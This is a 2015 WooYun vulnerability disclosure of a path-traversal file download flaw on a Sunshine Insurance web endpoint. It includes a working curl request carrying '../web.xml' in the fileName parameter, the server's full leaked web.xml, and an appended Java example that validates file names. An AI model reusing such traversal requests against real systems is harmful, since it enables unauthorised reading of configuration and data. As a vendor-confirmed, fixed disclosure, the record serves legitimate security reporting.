
Vulnerability summary

Defect ID: wooyun-2015-0142395

Vulnerability title: An arbitrary file download vulnerability in Sunshine Insurance (阳光保险)

Affected vendor: Sunshine Insurance Group (阳光保险集团)

Author: 逆流冰河

Submitted: 2015-09-21 12:50

Fixed: 2015-11-05 14:24

Published: 2015-11-05 14:24

Vulnerability type: sensitive information disclosure

Severity: medium

Self-assessed Rank: 10

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-09-21: Details sent to the vendor, awaiting vendor handling
2015-09-21: Vendor confirmed; details disclosed to the vendor only
2015-10-01: Details disclosed to core white hats and domain experts
2015-10-11: Details disclosed to regular white hats
2015-10-21: Details disclosed to trainee white hats
2015-11-05: Details disclosed to the public

Brief description:

1. This vulnerability was also found by accident; it was not the main thing I was trying to find.

Detailed description:

1. web.xml
http://kybpc.chexian.sinosig.com/easyInsurance/html5/downLoad.do?fileName=../web.xml
2. log4j.xml
http://kybpc.chexian.sinosig.com/easyInsurance/html5/downLoad.do?fileName=../classes/log4j.xml

Proof of vulnerability:

curl -vv 'http://kybpc.chexian.sinosig.com/easyInsurance/html5/downLoad.do?fileName=../web.xml'
* Hostname was NOT found in DNS cache
* Trying 111.203.203.13...
* Connected to kybpc.chexian.sinosig.com (111.203.203.13) port 80 (#0)
> GET /easyInsurance/html5/downLoad.do?fileName=../web.xml HTTP/1.1
> User-Agent: curl/7.37.1
> Host: kybpc.chexian.sinosig.com
> Accept: */*
>
< HTTP/1.1 200 OK
* Server Apache-Coyote/1.1 is not blacklisted
< Server: Apache-Coyote/1.1
< X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
< Content-Disposition: attachment;filename=../web.xml
< Content-Type: application/xml;charset=UTF-8
< Content-Language: zh-CN
< Transfer-Encoding: chunked
< Date: Mon, 21 Sep 2015 04:49:24 GMT
<
<?xml version="1.0" encoding="utf-8"?>
<web-app xmlns="http://java.sun.com/xml/ns/j2ee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
version="2.4"
xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd">
<!-- Path(s) of the Spring ApplicationContext configuration files; wildcards may be used,
multiple paths are separated by commas. This parameter is used by the Spring context loader below -->
<context-param>
<param-name>contextConfigLocation</param-name>
<param-value>
classpath*:spring/*.xml
</param-value>
</context-param>
<context-param>
<param-name>javax.servlet.jsp.jstl.fmt.localizationContext</param-name>
<param-value>i18n/messages</param-value>
</context-param>
<context-param>
<param-name>log4jConfigLocation</param-name>
<param-value>/WEB-INF/classes/log4j.xml</param-value>
</context-param>
<context-param>
<param-name>log4jRefreshInterval</param-name>
<param-value>5</param-value>
</context-param>
<!-- Server-side cache type -->
<context-param>
<param-name>cacheType</param-name>
<param-value>ehcache</param-value>
</context-param>
<!-- The well-known Character Encoding filter -->
<filter>
<filter-name>encodingFilter</filter-name>
<filter-class>org.springframework.web.filter.CharacterEncodingFilter</filter-class>
<init-param>
<param-name>encoding</param-name>
<param-value>UTF-8</param-value>
</init-param>
</filter>
<!-- GZIP compression filter for page resources -->
<filter>
<filter-name>compressFilter</filter-name>
<filter-class>ins.framework.web.CompressFilter</filter-class>
<init-param>
<param-name>ignoreKey</param-name>
<param-value>.js,.css,.gif,.jpg,.vbs</param-value>
</init-param>
</filter>
<filter>
<filter-name>struts2</filter-name>
<filter-class>
org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter
</filter-class>
</filter>
<filter>
<filter-name>SessionFilter</filter-name>
<filter-class>com.sinosoft.easyInsurance.common.web.SessionFilter</filter-class>
</filter>

<filter>
<filter-name>MenuDisabledFilter</filter-name>
<filter-class>com.sinosoft.easyInsurance.common.web.MenuDisabledFilter</filter-class>
</filter>
<!-- Cache Filter -->
<filter>
<filter-name>CacheFilter</filter-name>
<filter-class>ins.framework.web.CacheFilter</filter-class>
<init-param>
<param-name>expireTime</param-name>
<param-value>300</param-value>
</init-param>
</filter>
<filter-mapping>
<filter-name>CacheFilter</filter-name>
<url-pattern>*.js</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>CacheFilter</filter-name>
<url-pattern>*.css</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>CacheFilter</filter-name>
<url-pattern>*.gif</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>CacheFilter</filter-name>
<url-pattern>*.jpg</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>CacheFilter</filter-name>
<url-pattern>*.vbs</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>CacheFilter</filter-name>
<url-pattern>*.html</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>encodingFilter</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>encodingFilter</filter-name>
<url-pattern>*.do</url-pattern>
</filter-mapping>
<!-- GZIP compression filter for page resources, reduces network bandwidth -->
<filter-mapping>
<filter-name>compressFilter</filter-name>
<url-pattern>*.js</url-pattern>
</filter-mapping>

<filter-mapping>
<filter-name>MenuDisabledFilter</filter-name>
<url-pattern>*.do</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>struts2</filter-name>
<url-pattern>*.do</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>struts2</filter-name>
<url-pattern>*.jsp</url-pattern>
<dispatcher>REQUEST</dispatcher>
<dispatcher>FORWARD</dispatcher>
<dispatcher>INCLUDE</dispatcher>
</filter-mapping>
<filter-mapping>
<filter-name>struts2</filter-name>
<url-pattern>/struts/*</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>SessionFilter</filter-name>
<url-pattern>*.do</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>SessionFilter</filter-name>
<url-pattern>*.jsp</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>SessionFilter</filter-name>
<url-pattern>/*Servlet</url-pattern>
</filter-mapping>
<!-- Logging -->
<listener>
<listener-class>org.springframework.web.util.Log4jConfigListener</listener-class>
</listener>
<!-- Session Log Listener loading: <listener> <listener-class> ins.common.web.ClaimHttpSessionListener
</listener-class> </listener> -->
<!-- Spring ApplicationContext loading -->
<listener>
<listener-class>org.springframework.web.context.ContextLoaderListener</listener-class>
</listener>
<listener>
<listener-class>org.springframework.web.context.request.RequestContextListener</listener-class>
</listener>
<!-- Spring: flush the Introspector to prevent memory leaks -->
<listener>
<listener-class>
org.springframework.web.util.IntrospectorCleanupListener
</listener-class>
</listener>
<!-- cacheManager server-side cache -->
<listener>
<listener-class>ins.framework.cache.CacheManagerInitListener</listener-class>
</listener>
<!-- requestCombo component merging -->
<servlet>
<servlet-name>RequestComboServlet</servlet-name>
<servlet-class>ins.platform.requestcombo.RequestComboServlet</servlet-class>
<init-param>
<description>允许访问的URL前缀,避免源码泄漏风险</description>
<param-name>validPrefix</param-name>
<param-value>/widgets/</param-value>
</init-param>
<init-param>
<description>是否开启服务端对js文件混淆压缩</description>
<param-name>isCompress</param-name>
<param-value>false</param-value>
</init-param>
</servlet>
<servlet-mapping>
<servlet-name>RequestComboServlet</servlet-name>
<url-pattern>/requestCombo</url-pattern>
</servlet-mapping>
<filter-mapping>
<filter-name>CacheFilter</filter-name>
<url-pattern>/requestCombo</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>compressFilter</filter-name>
<url-pattern>/requestCombo</url-pattern>
</filter-mapping>
<!--
<servlet>
<display-name>Apache-Axis Servlet</display-name>
<servlet-name>AxisServlet</servlet-name>
<servlet-class>org.apache.axis.transport.http.AxisServlet</servlet-class>
</servlet>
<servlet>
<display-name>Axis Admin Servlet</display-name>
<servlet-name>AdminServlet</servlet-name>
<servlet-class>org.apache.axis.transport.http.AdminServlet</servlet-class>
<load-on-startup>100</load-on-startup>
</servlet>
-->
<servlet>
<servlet-name>serviceFactoryInitServlet</servlet-name>
<servlet-class>
com.sinosoft.easyInsurance.common.web.ServiceFactoryInitServlet
</servlet-class>
<load-on-startup>3</load-on-startup>
</servlet>
<!--
<servlet-mapping>
<servlet-name>AxisServlet</servlet-name>
<url-pattern>/servlet/AxisServlet</url-pattern>
</servlet-mapping>
<servlet-mapping>
<servlet-name>AxisServlet</servlet-name>
<url-pattern>*.jws</url-pattern>
</servlet-mapping>
<servlet-mapping>
<servlet-name>AxisServlet</servlet-name>
<url-pattern>/services/*</url-pattern>
</servlet-mapping>
<servlet-mapping>
<servlet-name>AdminServlet</servlet-name>
<url-pattern>/servlet/AdminServlet</url-pattern>
</servlet-mapping>
-->
<!-- Session timeout, in minutes -->
<session-config>
<session-timeout>60</session-timeout>
</session-config>
<mime-mapping>
<extension>js</extension>
<mime-type>text/javascript;charset=utf-8</mime-type>
</mime-mapping>
<mime-mapping>
<extension>htm</extension>
<mime-type>text/html;charset=utf-8</mime-type>
</mime-mapping>
<servlet>
<servlet-name>allocatePushServlet</servlet-name>
<servlet-class>
com.sinosoft.easyInsurance.common.web.ProxyServlet
</servlet-class>
<!-- <load-on-startup>3</load-on-startup> -->
</servlet>
<servlet-mapping>
<servlet-name>allocatePushServlet</servlet-name>
<url-pattern>/allocatePushServlet</url-pattern>
</servlet-mapping>
</web-app>

Fix recommendation:

I won't dig any further.
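The report leaves the fix open, so here is an added illustration (not the vendor's code) of how a download handler like downLoad.do can validate fileName before serving anything: treat the parameter as a bare file name, canonicalize it under a fixed download directory and confirm the result is still inside that directory, and build Content-Disposition from the validated name instead of echoing the raw input (the response above echoes filename=../web.xml verbatim). The download root, the extension allow-list and the class name are assumptions.

```java
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Set;

/** Hypothetical hardened resolver for a "downLoad.do?fileName=..." handler (added example). */
public final class SafeDownload {
    // Assumed directory holding the only files a user may fetch; never the web root.
    private static final Path DOWNLOAD_ROOT =
        Paths.get("/opt/app/download").toAbsolutePath().normalize();
    // Assumed allow-list; web.xml, log4j.xml and other config must never match.
    private static final Set<String> ALLOWED_EXT = Set.of("pdf", "zip", "png");

    /** Returns the file to serve, or null when the request must be rejected. */
    public static Path resolve(String fileName) {
        if (fileName == null || fileName.isEmpty()) return null;
        // Only a bare file name is acceptable: no separators, no "..", no NUL.
        if (fileName.contains("/") || fileName.contains("\\")
                || fileName.contains("..") || fileName.indexOf('\0') >= 0) {
            return null;
        }
        int dot = fileName.lastIndexOf('.');
        if (dot <= 0
                || !ALLOWED_EXT.contains(fileName.substring(dot + 1).toLowerCase())) {
            return null;
        }
        // Belt and braces: canonicalise and confirm we are still under the root.
        Path candidate = DOWNLOAD_ROOT.resolve(fileName).normalize();
        return candidate.startsWith(DOWNLOAD_ROOT) ? candidate : null;
    }

    /** Header built from the validated path only, never from the raw parameter. */
    public static String contentDisposition(Path file) {
        return "attachment; filename=\"" + file.getFileName() + "\"";
    }

    public static void main(String[] args) {
        // The two names from the report are rejected; a plain document is served.
        for (String name : new String[] {"report.pdf", "../web.xml", "../classes/log4j.xml"}) {
            Path p = resolve(name);
            System.out.println(name + " -> " + (p == null ? "REJECTED" : contentDisposition(p)));
        }
    }
}
```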

Copyright notice: when reposting, please credit the source: 逆流冰河@乌云


Vulnerability response

Vendor response:

Severity: medium

Vulnerability Rank: 6

Confirmed: 2015-09-21 14:23

Vendor reply:

Thanks for the submission.

Latest status:

None yet